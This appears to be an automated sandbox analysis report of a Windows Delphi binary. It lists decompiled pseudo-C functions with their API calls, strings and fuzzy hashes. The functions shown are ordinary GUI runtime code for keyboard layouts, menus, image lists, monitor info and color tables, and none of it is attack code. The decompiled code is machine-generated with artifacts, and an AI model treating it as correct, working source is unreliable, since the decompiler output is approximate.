                                                                        APIs
                                                                        • GetKeyboardLayoutList.USER32(00000040,?,00000000,004545BF,?,0215094C,?,00454621,00000000,?,00438B67), ref: 0045446A
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 004544D2
                                                                        • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,0045457B,?,80000002,00000000), ref: 0045450C
                                                                        • RegCloseKey.ADVAPI32(?,00454582,00000000,?,00000100,00000000,0045457B,?,80000002,00000000), ref: 00454575
                                                                        Strings
                                                                        • layout text, xrefs: 00454503
                                                                        • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 004544BC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                        • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                        • API String ID: 1703357764-2652665750
                                                                        • Opcode ID: 189765bfa51e4266e6c4d7a058433c68c56dc4b3013e98b6798dc43b9e3e9b53
                                                                        • Instruction ID: 2539a2497d52caec4cc5f2bae2980b59186013e12a04a0a3c27255b3f8e2aff6
                                                                        • Opcode Fuzzy Hash: 189765bfa51e4266e6c4d7a058433c68c56dc4b3013e98b6798dc43b9e3e9b53
                                                                        • Instruction Fuzzy Hash: 3D414174A0020DAFDB10DF55C981B9EB7F8EB88704F5144A6EA04EB352E734EE44DB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E0042326C(void* __eax, void* __edx) {
                                                                        				BYTE* _v8;
                                                                        				int _v12;
                                                                        				struct HDC__* _v16;
                                                                        				short _v18;
                                                                        				signed int _v24;
                                                                        				short _v26;
                                                                        				short _v28;
                                                                        				char _v38;
                                                                        				void* __ebx;
                                                                        				void* __ebp;
                                                                        				signed int _t35;
                                                                        				struct HDC__* _t43;
                                                                        				void* _t65;
                                                                        				intOrPtr _t67;
                                                                        				intOrPtr _t77;
                                                                        				void* _t80;
                                                                        				void* _t83;
                                                                        				void* _t85;
                                                                        				intOrPtr _t86;
                                                                        
                                                                        				_t83 = _t85;
                                                                        				_t86 = _t85 + 0xffffffdc;
                                                                        				_t80 = __edx;
                                                                        				_t65 = __eax;
                                                                        				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
                                                                        					return __eax;
                                                                        				} else {
                                                                        					E00402EF0( &_v38, 0x16);
                                                                        					_t67 =  *((intOrPtr*)(_t65 + 0x28));
                                                                        					_v38 = 0x9ac6cdd7;
                                                                        					_t35 =  *((intOrPtr*)(_t67 + 0x18));
                                                                        					if(_t35 != 0) {
                                                                        						_v24 = _t35;
                                                                        					} else {
                                                                        						_v24 = 0x60;
                                                                        					}
                                                                        					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
                                                                        					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
                                                                        					_t43 = E00421870( &_v38);
                                                                        					_v18 = _t43;
                                                                        					_push(0);
                                                                        					L00406EB4();
                                                                        					_v16 = _t43;
                                                                        					_push(_t83);
                                                                        					_push(0x4233a7);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t86;
                                                                        					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
                                                                        					_v8 = E00402754(_v12);
                                                                        					_push(_t83);
                                                                        					_push(0x423387);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t86;
                                                                        					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
                                                                        						E00420A80(_t67);
                                                                        					}
                                                                        					E00416B7C(_t80, 0x16,  &_v38);
                                                                        					E00416B7C(_t80, _v12, _v8);
                                                                        					_pop(_t77);
                                                                        					 *[fs:eax] = _t77;
                                                                        					_push(E0042338E);
                                                                        					return E00402774(_v8);
                                                                        				}
                                                                        			}























                                                                        APIs
                                                                        • MulDiv.KERNEL32(?,?,000009EC), ref: 004232BE
                                                                        • MulDiv.KERNEL32(?,?,000009EC), ref: 004232D5
                                                                        • 72E7AC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 004232EC
                                                                        • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004233A7,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00423310
                                                                        • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,00423387,?,?,00000000,00000000,00000008,?,00000000,004233A7), ref: 00423343
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: BitsFileMeta
                                                                        • String ID: `
                                                                        • API String ID: 858000408-2679148245
                                                                        • Opcode ID: 558b4f842d45610530c19de20ebe86704c1cece71444c5e02f9d3581222144b0
                                                                        • Instruction ID: 3839b95b636f5826239c880ae12cce9acd53ea68cca29137c77ea4b08317ef11
                                                                        • Opcode Fuzzy Hash: 558b4f842d45610530c19de20ebe86704c1cece71444c5e02f9d3581222144b0
                                                                        • Instruction Fuzzy Hash: 7D314775B00258ABDB00DFD5D881AAEB7B8EF08704F514096F904EB291D6789E40D7A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 73%
                                                                        			E0041C0B0() {
                                                                        				char _v5;
                                                                        				intOrPtr* _v12;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				long _t16;
                                                                        				char _t19;
                                                                        				intOrPtr _t21;
                                                                        				intOrPtr _t22;
                                                                        				intOrPtr _t24;
                                                                        				intOrPtr _t34;
                                                                        				void* _t39;
                                                                        				intOrPtr _t46;
                                                                        				intOrPtr* _t47;
                                                                        				intOrPtr _t48;
                                                                        				intOrPtr _t51;
                                                                        				void* _t53;
                                                                        				void* _t55;
                                                                        				void* _t58;
                                                                        				void* _t60;
                                                                        				intOrPtr _t61;
                                                                        
                                                                        				_t58 = _t60;
                                                                        				_t61 = _t60 + 0xfffffff0;
                                                                        				_push(_t39);
                                                                        				_push(_t55);
                                                                        				_push(_t53);
                                                                        				_t16 = GetCurrentThreadId();
                                                                        				_t47 =  *0x495c4c; // 0x496030
                                                                        				if(_t16 !=  *_t47) {
                                                                        					_v20 = GetCurrentThreadId();
                                                                        					_v16 = 0;
                                                                        					_t46 =  *0x495acc; // 0x410438
                                                                        					E0040A274(_t39, _t46, 1, _t53, _t55, 0,  &_v20);
                                                                        					E00403DA8();
                                                                        				}
                                                                        				if( *0x496a00 == 0) {
                                                                        					_v5 = 0;
                                                                        					return _v5;
                                                                        				} else {
                                                                        					_push(0x496a04);
                                                                        					L004068AC();
                                                                        					_push(_t58);
                                                                        					_push(0x41c1c6);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t61;
                                                                        					if( *0x47a4b8 == 0) {
                                                                        						L5:
                                                                        						_t19 = 0;
                                                                        					} else {
                                                                        						_t34 =  *0x47a4b8; // 0x0
                                                                        						if( *((intOrPtr*)(_t34 + 8)) > 0) {
                                                                        							_t19 = 1;
                                                                        						} else {
                                                                        							goto L5;
                                                                        						}
                                                                        					}
                                                                        					_v5 = _t19;
                                                                        					if(_v5 != 0) {
                                                                        						while(1) {
                                                                        							_t21 =  *0x47a4b8; // 0x0
                                                                        							if( *((intOrPtr*)(_t21 + 8)) <= 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t22 =  *0x47a4b8; // 0x0
                                                                        							_v12 = E00414208(_t22, 0);
                                                                        							_t24 =  *0x47a4b8; // 0x0
                                                                        							E004140F8(_t24, 0);
                                                                        							 *[fs:eax] = _t61;
                                                                        							 *((intOrPtr*)( *_v12 + 0x20))( *[fs:eax], 0x41c179, _t58);
                                                                        							_pop(_t51);
                                                                        							 *[fs:eax] = _t51;
                                                                        							SetEvent( *(_v12 + 4));
                                                                        						}
                                                                        						 *0x496a00 = 0;
                                                                        					}
                                                                        					_pop(_t48);
                                                                        					 *[fs:eax] = _t48;
                                                                        					_push(E0041C1D1);
                                                                        					_push(0x496a04);
                                                                        					L004069F4();
                                                                        					return 0;
                                                                        				}
                                                                        			}




























                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0041C0B9
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0041C0C8
                                                                        • RtlEnterCriticalSection.KERNEL32(00496A04,?,?,00000000), ref: 0041C103
                                                                        • SetEvent.KERNEL32(?,?,00496A04,?,?,00000000), ref: 0041C197
                                                                        • RtlLeaveCriticalSection.KERNEL32(00496A04,0041C1D1,00496A04,?,?,00000000), ref: 0041C1C0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CriticalCurrentSectionThread$EnterEventLeave
                                                                        • String ID: 0`I
                                                                        • API String ID: 130076905-2983702033
                                                                        • Opcode ID: d0ef8c18c672c5093def7dce1c420b319e01ce4750e548a04579464797611688
                                                                        • Instruction ID: d3fc0090a8b2a4d8759e39c8523565b2f55ac54e1dab5fd3bc4b06f7a5c1992e
                                                                        • Opcode Fuzzy Hash: d0ef8c18c672c5093def7dce1c420b319e01ce4750e548a04579464797611688
                                                                        • Instruction Fuzzy Hash: 53314634284240AFD701DB64DC85BAE7BE4EB4A314F2680BBE405936A2C77D58D5CB2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004467FC(int __eax, void* __edx) {
                                                                        				signed int _t39;
                                                                        				signed int _t40;
                                                                        				intOrPtr _t44;
                                                                        				int _t46;
                                                                        				int _t47;
                                                                        				intOrPtr* _t48;
                                                                        
                                                                        				_t18 = __eax;
                                                                        				_t48 = __eax;
                                                                        				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
                                                                        					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                                                                        						 *((char*)(__eax + 0x74)) = 1;
                                                                        						return __eax;
                                                                        					}
                                                                        					_t19 =  *((intOrPtr*)(__eax + 0x6c));
                                                                        					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
                                                                        						return E004467FC(_t19, __edx);
                                                                        					}
                                                                        					_t18 = GetMenuItemCount(E0044692C(__eax));
                                                                        					_t47 = _t18;
                                                                        					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
                                                                        					while(_t47 > 0) {
                                                                        						_t46 = _t47 - 1;
                                                                        						_t18 = GetMenuState(E0044692C(_t48), _t46, 0x400);
                                                                        						if((_t18 & 0x00000004) == 0) {
                                                                        							_t18 = RemoveMenu(E0044692C(_t48), _t46, 0x400);
                                                                        							_t40 = 1;
                                                                        						}
                                                                        						_t47 = _t47 - 1;
                                                                        					}
                                                                        					if(_t40 != 0) {
                                                                        						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
                                                                        							L14:
                                                                        							E004466C8(_t48);
                                                                        							L15:
                                                                        							return  *((intOrPtr*)( *_t48 + 0x3c))();
                                                                        						}
                                                                        						_t44 =  *0x44531c; // 0x445368
                                                                        						if(E00403768( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044692C(_t48)) != 0) {
                                                                        							goto L14;
                                                                        						} else {
                                                                        							DestroyMenu( *(_t48 + 0x34));
                                                                        							 *(_t48 + 0x34) = 0;
                                                                        							goto L15;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t18;
                                                                        			}










                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: hSD
                                                                        • API String ID: 0-1503840404
                                                                        • Opcode ID: 1876fe4bb239e0ece3342b9e9a9a543713abc34dcbc0b90a04d39e0c55f526ff
                                                                        • Instruction ID: ba21534d86675a3933ba5c7ede87d647a4094e5fe0645c481f54663c532360df
                                                                        • Opcode Fuzzy Hash: 1876fe4bb239e0ece3342b9e9a9a543713abc34dcbc0b90a04d39e0c55f526ff
                                                                        • Instruction Fuzzy Hash: D2117871A0260596FB50BF3A9C0575B7B989F43749F06442BBC01A7387CA7DCC09865F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 31%
                                                                        			E0043E484(void* __eax) {
                                                                        				char _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v16;
                                                                        				intOrPtr* _t14;
                                                                        				intOrPtr* _t17;
                                                                        				char _t19;
                                                                        				intOrPtr* _t21;
                                                                        				void* _t23;
                                                                        				intOrPtr* _t26;
                                                                        				void* _t28;
                                                                        				intOrPtr _t37;
                                                                        				void* _t39;
                                                                        				intOrPtr _t47;
                                                                        				void* _t49;
                                                                        				void* _t51;
                                                                        				intOrPtr _t52;
                                                                        
                                                                        				_t49 = _t51;
                                                                        				_t52 = _t51 + 0xfffffff4;
                                                                        				_t39 = __eax;
                                                                        				if( *((short*)(__eax + 0x68)) == 0xffff) {
                                                                        					return __eax;
                                                                        				} else {
                                                                        					_t14 =  *0x495998; // 0x496a9c
                                                                        					_t17 =  *0x495998; // 0x496a9c
                                                                        					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
                                                                        					_push(_t19);
                                                                        					L00426A90();
                                                                        					_v8 = _t19;
                                                                        					_push(_t49);
                                                                        					_push(0x43e544);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t52;
                                                                        					_t21 =  *0x495c2c; // 0x496c08
                                                                        					_t23 = E0045469C( *_t21,  *((short*)(__eax + 0x68)));
                                                                        					_t4 =  &_v8; // 0x434646
                                                                        					E00426AC8( *_t4, _t23);
                                                                        					_t26 =  *0x495c2c; // 0x496c08
                                                                        					_t28 = E0045469C( *_t26,  *((short*)(_t39 + 0x68)));
                                                                        					_t6 =  &_v8; // 0x434646
                                                                        					E00426AC8( *_t6, _t28);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_t7 =  &_v8; // 0x434646
                                                                        					_push( *_t7);
                                                                        					L00426B20();
                                                                        					_push( &_v16);
                                                                        					_push(0);
                                                                        					L00426B30();
                                                                        					_push(_v12);
                                                                        					_push(_v16);
                                                                        					_push(1);
                                                                        					_t11 =  &_v8; // 0x434646
                                                                        					_push( *_t11);
                                                                        					L00426B20();
                                                                        					_pop(_t47);
                                                                        					 *[fs:eax] = _t47;
                                                                        					_push(0x43e54b);
                                                                        					_t12 =  &_v8; // 0x434646
                                                                        					_t37 =  *_t12;
                                                                        					_push(_t37);
                                                                        					L00426A98();
                                                                        					return _t37;
                                                                        				}
                                                                        			}




















                                                                        APIs
                                                                        • 73451AB0.COMCTL32(00000000), ref: 0043E4B6
                                                                          • Part of subcall function 00426AC8: 73452140.COMCTL32(FFC,000000FF,00000000,0043E4E6,00000000,0043E544,?,00000000), ref: 00426ACC
                                                                        • 73451680.COMCTL32(FFC,00000000,00000000,00000000,00000000,0043E544,?,00000000), ref: 0043E50A
                                                                        • 73451710.COMCTL32(00000000,?,FFC,00000000,00000000,00000000,00000000,0043E544,?,00000000), ref: 0043E515
                                                                        • 73451680.COMCTL32(FFC,00000001,?,0043E5AD,00000000,?,FFC,00000000,00000000,00000000,00000000,0043E544,?,00000000), ref: 0043E528
                                                                        • 73451F60.COMCTL32(FFC,0043E54B,0043E5AD,00000000,?,FFC,00000000,00000000,00000000,00000000,0043E544,?,00000000), ref: 0043E53E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: 7345173451680$7345171073452140
                                                                        • String ID: FFC
                                                                        • API String ID: 821207058-3265319113
                                                                        • Opcode ID: c553ae45f4f59dda8c743e9a5beeb43619ad60567a59fbf0dee4961d1089d07a
                                                                        • Instruction ID: 8431b77a0cc210c779f3d261e8a6c9ecaf50c2f7b8c230ae1f7395ec22db308d
                                                                        • Opcode Fuzzy Hash: c553ae45f4f59dda8c743e9a5beeb43619ad60567a59fbf0dee4961d1089d07a
                                                                        • Instruction Fuzzy Hash: 48218174740214BFDB00EBE9DC92F6977F8EB49704F6044A6F904EB291DA79AD40CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 47%
                                                                        			E0042761C(intOrPtr _a4, intOrPtr* _a8) {
                                                                        				void _v20;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t23;
                                                                        				int _t24;
                                                                        				intOrPtr _t26;
                                                                        				intOrPtr _t27;
                                                                        				intOrPtr* _t29;
                                                                        				intOrPtr* _t31;
                                                                        
                                                                        				_t29 = _a8;
                                                                        				_t27 = _a4;
                                                                        				if( *0x496ac9 != 0) {
                                                                        					_t24 = 0;
                                                                        					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                        						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                        						 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                        						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                                                        						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						_t31 = _t29;
                                                                        						 *(_t31 + 0x24) = 1;
                                                                        						if( *_t31 >= 0x4c) {
                                                                        							_push("DISPLAY");
                                                                        							_push(_t31 + 0x28);
                                                                        							L00406A9C();
                                                                        						}
                                                                        						_t24 = 1;
                                                                        					}
                                                                        				} else {
                                                                        					_t26 =  *0x496ab0; // 0x42761c
                                                                        					 *0x496ab0 = E00427218(5, _t23, _t26, _t27, _t29);
                                                                        					_t24 =  *0x496ab0(_t27, _t29);
                                                                        				}
                                                                        				return _t24;
                                                                        			}















                                                                        APIs
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00427674
                                                                        • GetSystemMetrics.USER32 ref: 00427689
                                                                        • GetSystemMetrics.USER32 ref: 00427694
                                                                        • lstrcpy.KERNEL32(?,DISPLAY), ref: 004276BE
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                        • String ID: DISPLAY$GetMonitorInfoA
                                                                        • API String ID: 2545840971-1370492664
                                                                        • Opcode ID: 29cf01dcd43958f641ba807ef5d29dee25e5501a003724a3729d2d1307860ead
                                                                        • Instruction ID: fbb31de7d48d14f86b9486c0f2b6d2713dbdd219238fa15b14bdad62d3ba1336
                                                                        • Opcode Fuzzy Hash: 29cf01dcd43958f641ba807ef5d29dee25e5501a003724a3729d2d1307860ead
                                                                        • Instruction Fuzzy Hash: 0411E731704B215FD3208F75AC48B67B7A9EF06324F50853FED46A7651D374A8008B6C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 47%
                                                                        			E004276F0(intOrPtr _a4, intOrPtr* _a8) {
                                                                        				void _v20;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t23;
                                                                        				int _t24;
                                                                        				intOrPtr _t26;
                                                                        				intOrPtr _t27;
                                                                        				intOrPtr* _t29;
                                                                        				intOrPtr* _t31;
                                                                        
                                                                        				_t29 = _a8;
                                                                        				_t27 = _a4;
                                                                        				if( *0x496aca != 0) {
                                                                        					_t24 = 0;
                                                                        					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                        						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                        						 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                        						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                                                        						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						_t31 = _t29;
                                                                        						 *(_t31 + 0x24) = 1;
                                                                        						if( *_t31 >= 0x4c) {
                                                                        							_push("DISPLAY");
                                                                        							_push(_t31 + 0x28);
                                                                        							L00406A9C();
                                                                        						}
                                                                        						_t24 = 1;
                                                                        					}
                                                                        				} else {
                                                                        					_t26 =  *0x496ab4; // 0x4276f0
                                                                        					 *0x496ab4 = E00427218(6, _t23, _t26, _t27, _t29);
                                                                        					_t24 =  *0x496ab4(_t27, _t29);
                                                                        				}
                                                                        				return _t24;
                                                                        			}















                                                                        APIs
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00427748
                                                                        • GetSystemMetrics.USER32 ref: 0042775D
                                                                        • GetSystemMetrics.USER32 ref: 00427768
                                                                        • lstrcpy.KERNEL32(?,DISPLAY), ref: 00427792
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                        • String ID: DISPLAY$GetMonitorInfoW
                                                                        • API String ID: 2545840971-2774842281
                                                                        • Opcode ID: 86a7c240a20f1940e20b11c1b8e177f6ccac7c4339d5c7d8de5956c4a5bb898f
                                                                        • Instruction ID: 831a537686c86f16d1a85402d57f1e65c448198929f9e699794ec6438de5e3da
                                                                        • Opcode Fuzzy Hash: 86a7c240a20f1940e20b11c1b8e177f6ccac7c4339d5c7d8de5956c4a5bb898f
                                                                        • Instruction Fuzzy Hash: AC11E4717057119FD3209F60AC407A7B7E8EB86314F40853BED49A7251D274B8008BAC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E004238F0(int __eax, void* __ecx, intOrPtr __edx) {
                                                                        				intOrPtr _v8;
                                                                        				int _v12;
                                                                        				struct HDC__* _v16;
                                                                        				void* _v20;
                                                                        				struct tagRGBQUAD _v1044;
                                                                        				int _t16;
                                                                        				struct HDC__* _t18;
                                                                        				int _t31;
                                                                        				int _t34;
                                                                        				intOrPtr _t41;
                                                                        				void* _t43;
                                                                        				void* _t46;
                                                                        				void* _t48;
                                                                        				intOrPtr _t49;
                                                                        
                                                                        				_t16 = __eax;
                                                                        				_t46 = _t48;
                                                                        				_t49 = _t48 + 0xfffffbf0;
                                                                        				_v8 = __edx;
                                                                        				_t43 = __eax;
                                                                        				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
                                                                        					L5:
                                                                        					return _t16;
                                                                        				} else {
                                                                        					_t16 = E004212BC(_v8, 0xff,  &_v1044);
                                                                        					_t34 = _t16;
                                                                        					if(_t34 == 0) {
                                                                        						goto L5;
                                                                        					} else {
                                                                        						_push(0);
                                                                        						L00406EB4();
                                                                        						_v12 = _t16;
                                                                        						_t18 = _v12;
                                                                        						_push(_t18);
                                                                        						L00406AE4();
                                                                        						_v16 = _t18;
                                                                        						_v20 = SelectObject(_v16, _t43);
                                                                        						_push(_t46);
                                                                        						_push(0x42399f);
                                                                        						_push( *[fs:eax]);
                                                                        						 *[fs:eax] = _t49;
                                                                        						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
                                                                        						_pop(_t41);
                                                                        						 *[fs:eax] = _t41;
                                                                        						_push(0x4239a6);
                                                                        						SelectObject(_v16, _v20);
                                                                        						DeleteDC(_v16);
                                                                        						_t31 = _v12;
                                                                        						_push(_t31);
                                                                        						_push(0);
                                                                        						L00407124();
                                                                        						return _t31;
                                                                        					}
                                                                        				}
                                                                        			}


















                                                                        APIs
                                                                          • Part of subcall function 004212BC: GetObjectA.GDI32(00000000,00000004), ref: 004212D3
                                                                          • Part of subcall function 004212BC: 72E7AEA0.GDI32(00000000,00000000,?,00000028,00000000,00000004,?,000000FF,00000000,00000018,00000000,00423BFA,00000000,00423D50,?,00000000), ref: 004212F6
                                                                        • 72E7AC50.USER32(00000000), ref: 0042392E
                                                                        • 72E7A590.GDI32(?,00000000), ref: 0042393A
                                                                        • SelectObject.GDI32(?), ref: 00423947
                                                                        • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,0042399F,?,?,?,?,00000000), ref: 0042396B
                                                                        • SelectObject.GDI32(?,?), ref: 00423985
                                                                        • DeleteDC.GDI32(?), ref: 0042398E
                                                                        • 72E7B380.USER32(00000000,?,?,?,?,004239A6,?,00000000,0042399F,?,?,?,?,00000000), ref: 00423999
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Object$Select$A590B380ColorDeleteTable
                                                                        • String ID:
